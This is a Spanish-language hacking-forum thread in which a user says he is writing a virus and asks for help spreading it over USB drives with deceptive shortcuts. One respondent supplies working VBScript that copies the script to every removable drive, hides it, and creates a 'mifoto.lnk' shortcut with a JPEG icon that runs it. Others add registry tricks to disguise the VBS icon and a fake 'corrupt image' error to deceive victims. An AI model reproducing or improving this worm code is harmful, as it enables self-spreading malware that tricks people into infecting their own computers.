[AYUDA][VBS] Pasar varios argumentos en un acceso directo

Iniciado por danny920825, 11 Marzo 2014, 03:53 AM

0 Miembros y 1 Visitante están viendo este tema.

danny920825

Hola a todos los maestros del worm en vbs y a otros despiadados creadores de mis pesadillas en vbs.
Vengo a pedir un consejo o una ayuda con un proyecto que tengo en mente. La verdad es que es un virus mas, pero para este caso, pienso hacer algo que es nuevo para mi, pero que no logro que me salga y no he visto en ningun manual. La idea es completar una de estas acciones

1- que el virus cambie el tradicional icono del pergamino por un JPG (esto lo vi en un virus hace un año, pero no pensaba entrar en este mundo cuando aquello). Se que se hace desde el registro. De este forma, no tengo que crear un metodo externo para que el virus se copie de las USB a las PC.

2-Este metodo es el posiblemente mas facil, pero ustedes diran: consiste en crear un acceso directo en el USb con un nombre irresistible con el icono de una foto o un video (supongo que deba funcionar lo del icono aunque la PC no tenga privilegios administrativos) y que en los parametros del acceso directo se ejecute mas de una opcion, las cuales serian:
a) Copiar el virus para la PC
b) Ejecutar el virus desde la PC
c) Abrir la opcion engañosa que dice el acceso directo (Ej: Abrir una foto)

nota: el paso a) y b) del metodo 2, se pueden resumir en ejecutar el codigo desde el usb y el solo se copiaria a la pc.

Espero que me ayuden con esto. por cierto, me hablaron del codigo que generaba barrotes en la pantalla (como hacer algo parecido????)
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno

Mad Antrax

#1
Te lo muevo al foro de scripting.

Ahí te podrán ayudar mucho mejor. Elektro es un dios de los scripts xD
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Mad Antrax

#2
Bueno, mientras te responden, te dejo una posible solución:

Código (vb) [Seleccionar]
On Error Resume Next

Set WSS = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")

SpreadUSB

Function SpreadUSB()
for each drive in FSO.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
FSO.copyfile wscript.scriptfullname , drive.path & "\" & wscript.scriptname,true
FSO.getfile(drive.path & "\"  & wscript.scriptname).attributes = 2+4
set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\")
lnkobj.save()
end if
end if
end if
next
End Function

MsgBox "soy un virus"




Es un ejemplo muy sencillo:

Busca todas las unidades del PC que sean extraibles. Si la unidad está disponible y con espacio... copia el script y lo oculta. Luego crea un acceso directo al script y le establece el icono de una foto.

Lo que preguntas de copiar el virus al PC, añadir al registro y tal... es demasiado fácil como para volverlo a explicar. Te remito al tutorial de VBS que seguro resolverá tus otras dudas.

http://foro.elhacker.net/scripting/tutorial_vbscript-t229032.0.html

Saludos
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

79137913

HOLA!!!

Buen codigo, yo cambiaria el msgbox del final por un vbCritical con "Imagen Corrupta, &H89BA3D7E No se puede READ."

GRACIAS POR LEER!!!
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

79137913                          *Shadow Scouts Team*

Mad Antrax

Cita de: 79137913 en 11 Marzo 2014, 12:27 PM
HOLA!!!

Buen codigo, yo cambiaria el msgbox del final por un vbCritical con "Imagen Corrupta, &H89BA3D7E No se puede READ."

GRACIAS POR LEER!!!

Tengo que preguntartelo... tu nick tiene algún significado lógico o simplemente te salió al hacer una consulta random?

Código (vb) [Seleccionar]
MiNick = Int(Rnd * 999999999)

:huh: :huh: :huh: :huh: :huh: :huh:
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Eleкtro

#5
Ya te solucionaron el punto 2, respondiendo al punto 1 e diré que:

Solo tienes que modificar el icono del tipo de archivo registrado como 'VBSFile':
HKEY_CLASSES_ROOT\VBSFile\DefaultIcon

Por el icono del tipo de archivo registrado como 'jpegfile':
HKEY_CLASSES_ROOT\jpegfile\DefaultIcon

Pero, óbviamente, este cambio requiere de un reinicio o relogueo del usuario actual.

Otra forma de cambiar el icono, de forma permanente e inmediata, sería usar una utilidad (Ej: ExeScript Editor) para 'compilar' el archivo VBS en un EXE, y modificar el icono del archivo executable.

Saludos








79137913

HOLA!!!

Cita de: ||MadAntrax|| en 11 Marzo 2014, 12:30 PM
Tengo que preguntartelo... tu nick tiene algún significado lógico o simplemente te salió al hacer una consulta random?

Código (vb) [Seleccionar]
MiNick = Int(Rnd * 999999999)

:huh: :huh: :huh: :huh: :huh: :huh:

El porque de mi nick = practicidad, para una respuesta mas extendida:
http://foro.elhacker.net/foro_libre/la_historia_de_su_nick-t386227.0.html;msg1840023#msg1840023

GRACIAS POR LEER!!!
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

79137913                          *Shadow Scouts Team*

danny920825

El Ejemplo esta Genial, ya he visto varios codigos asi, pero lo que quiero hacer es un pokito mas complicado. Es que cuando el usuario haga clic en el acceso directo suceda algo asi

[code = vb]

Set objshell = CreateObject("WScript.Shell")
Set objfso= CreateObject("Scripting.FileSystemObject")

'Cuando el usuario clickee ocurriria esto

objfso.copyfile wscript.scriptname,"c:\mivirus",true
objfso.copyfile wscript.scriptname, "d:\",true
objshell.run "mifoto.jpg"


No se si deje claro el ejemplo pero lo que quiero hacer es colocar mas de una instruccion en el acceso directo, porque otra buena idea seria crear un segundo codigo que seria el que hiciera todo lo demas. Pero es que me gustaria hacerlo con un mismo codigo ¿Me hago entender o quieres que haga mi intento por poner un ejemplo?
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno

danny920825

Hello otra vez, me discupo por no probar las cosas antes de decir que no. El ejemplo no lo pude probar porque el KAV me lo elimina al momento y no tengo el pass para cerrarlo jaja.

Lo cierto es que la base es el & delante del comando
yo estaba probando algo asi

"cmd.exe /c start notepad.exe" & chr(13) & chr(10) & "start calc.exe"

asi intentaba ejecutar el bloc de notas, insertar un retorno de carrito y intentaba ejecutar despues la calculadora, pero solo se ejecutaba el bloc de notas.
Bien para aquellos que ven en esto la posibilidad interminable de herramientas desde accesos directos, pues he aki la solucion lineal gracias a ||MadAntrax|| :

"cmd.exe /c start notepad.exe" & "&start explorer " & "&exit"

Gracias a todos. Y si no hay ninguna duda sobre el tema...
¡Moderador! TEMA CERRADO
"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno

Eleкtro

#9
Cita de: danny920825 en 15 Marzo 2014, 00:34 AM"cmd.exe /c start notepad.exe" & "&start explorer " & "&exit"

La sintaxis es erronea, y, en este caso te está funcionando, pero deberías encerrar los argumentos del proceso (CMD) y también de los comandos, si te importa la integridad del código y no quieres obtener errores en el futuro (como por ejemplo no poder ejecutar proces que tengan espacio en el nombre):


CMD /C "Argumentos"

Start Título Proceso


Entonces así es como debe quedar literálmente:
"CMD.exe" /C " start "" "notepad.exe" & start "" "explorer.exe" "


El Script en VBS:
Código (vb) [Seleccionar]


Const StartQuote = " "" "
Const EndQuote   = " """
Const Quote      = """"
Const Quotes     = " """" "

Set WSS = WScript.CreateObject("WScript.Shell")

WSS.run WSS.ExpandEnvironmentStrings("""%ComSpec%""" & " /C ") & _
        StartQuote                                             & _
        "start" & Quotes & Quote & "notepad.exe"  & Quote      & _
        " & "                                                  & _
        "start" & Quotes & Quote & "explorer.exe" & Quote      & _
        EndQuote



Saludos